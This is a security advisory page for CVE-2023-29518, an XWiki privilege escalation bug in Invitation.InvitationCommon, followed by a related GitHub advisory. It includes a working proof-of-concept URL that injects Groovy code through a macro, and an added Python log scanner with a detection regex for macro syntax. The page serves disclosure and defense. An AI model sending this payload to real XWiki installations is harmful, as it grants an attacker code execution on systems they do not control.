CVE-2023-29518: Privilege escalation (PR) from view right using Invitation.InvitationCommon

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of Invitation.InvitationCommon. This page is installed by default. The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. Users are advised to upgrade. There are no known workarounds for this issue.


Steps to reproduce:

Open <xwiki-host>/xwiki/bin/view/%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=Invitation.InvitationCommon&xpage=view&test=1 where <xwiki-host> is the URL of your XWiki installation.

Expected result:

The message

testLoadInvitationConfig Class document ]] {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}} not found. can't run test.

(or similar) or no message at all (not sure the test parameter is a real feature and not a bug), but not the string "Hello from groovy!".

Actual result:

The message

testLoadInvitationConfig Class document ]] {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}} Hello from groovy!.WebHome]] not found. can't run test.

is displayed. With Apache Tomcat/9.0.68 (Docker container), the message is Class document view Hello from groovy!.WebHome]] not found. can't run test. as it somehow considers "xwiki/bin/view" as part of the document reference. In both cases, this demonstrates a privilege escalation from view to programming rights.

Note that Invitation.InvitationCommon contains a rights object that explicitly grants view rights to all users and guests so this might even be exploitable on otherwise relatively closed wikis if the exploit URL can be constructed to allow view rights for the user used by the attacker (not sure if this is possible).
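As an added example (not part of the advisory, the Jira issue or XWiki's own code), the following Python script shows the detection side of the issue above: it percent-decodes request targets from web-server access logs and flags any that embed XWiki script or async macro syntax such as `{{groovy}}` or `{{async ...}}`, which is what the reproduction URL relies on. The log lines, regular expressions and function names are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Script/async macro syntax that never belongs in a document reference in a request path.
MACRO_RE = re.compile(r"\{\{/?(groovy|python|velocity|async)\b", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not real traffic); the second one carries the
# reproduction URL quoted on this page, the third a benign request for the same sheet.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2023:12:00:01 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120
10.0.0.7 - - [10/Apr/2023:12:00:02 +0000] "GET /xwiki/bin/view/%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=Invitation.InvitationCommon&xpage=view&test=1 HTTP/1.1" 200 2048
10.0.0.9 - - [10/Apr/2023:12:00:03 +0000] "GET /xwiki/bin/view/Invitation/InvitationCommon?sheet=Invitation.InvitationCommon HTTP/1.1" 200 3000
"""

def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def analyse_request(target: str) -> dict:
    """Decode one request target and report any wiki macro syntax found in it."""
    decoded = fully_decode(target)
    parts = urlsplit(decoded)
    macros = sorted({m.group(1).lower() for m in MACRO_RE.finditer(decoded)})
    return {
        "path": parts.path,
        "sheet": parse_qs(parts.query).get("sheet", [None])[0],
        "macros": macros,
        "suspicious": bool(macros),
    }

def scan_log(text: str) -> list:
    """Return one finding per log line whose request target embeds macro syntax."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            result = analyse_request(m.group("target"))
            if result["suspicious"]:
                result["client"] = line.split(" ", 1)[0]
                findings.append(result)
    return findings

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Only the request carrying macro syntax is reported; a plain request for the same sheet is not, so the `sheet` value is kept as context rather than used as the indicator.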

Related news

GHSA-px54-3w5j-qjg9: XWiki Platform vulnerable to privilege escalation from view right using Invitation.InvitationCommon

### Impact

Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of `Invitation.InvitationCommon`. This page is installed by default. See https://jira.xwiki.org/browse/XWIKI-20283 for the reproduction steps.

### Patches

The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.

### Workarounds

The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/3d055a0a5ec42fdebce4d71ee98f94553fdbfebf) on `Invitation.InvitationCommon`.

### References

- https://github.com/xwiki/xwiki-platform/commit/3d055a0a5ec42fdebce4d71ee98f94553fdbfebf
- https://jira.xwiki.org/browse/XWIKI-20283

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
